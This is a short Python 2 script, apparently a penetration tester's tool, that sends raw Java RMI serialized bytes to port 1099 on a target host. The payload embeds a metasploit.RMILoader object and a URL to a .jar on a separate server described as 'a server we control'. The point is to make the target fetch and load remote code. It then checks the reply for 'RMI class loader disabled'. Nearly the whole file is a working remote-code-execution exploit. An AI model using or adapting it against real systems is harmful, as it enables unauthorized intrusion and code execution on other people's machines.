Quick and dirty RMI invoker

pyrmi.py

#!/usr/bin/python

"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""

import socket
import binascii
import struct

HOST = '10.10.0.1'
PORT = 1099
fileloc = "http://10.10.0.2/myfile.jar"
dlen = len(fileloc)

data = ["\x4a\x52\x4d\x49\x00\x02\x4b\x00\x00\x00\x00\x00\x00",
       "\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00",
       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
       "\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a",
       "\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f",
       "\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00",
       "\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00",
       "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e",
       "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2",
       "\xf4\x02\x00\x00\x74\x00",
       #struct.pack("h%ds" % (len(fileloc),), len(fileloc), fileloc), #where to download from
       "\x1e",struct.pack("%ds"%(len(fileloc),),fileloc),
       "\x78\x70\x77\x01\x00\x0a"]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(''.join(data))
dp = s.recv(1024)

#print "Response from RMI server: %s"%repr(dp)
dp = s.recv(2024)
dp = s.recv(2024)
#print "Response from RMI server: %s"%repr(dp)

if "RMI class loader disabled" in dp:
     print "[x] RMI class loader disabled.. No cigar"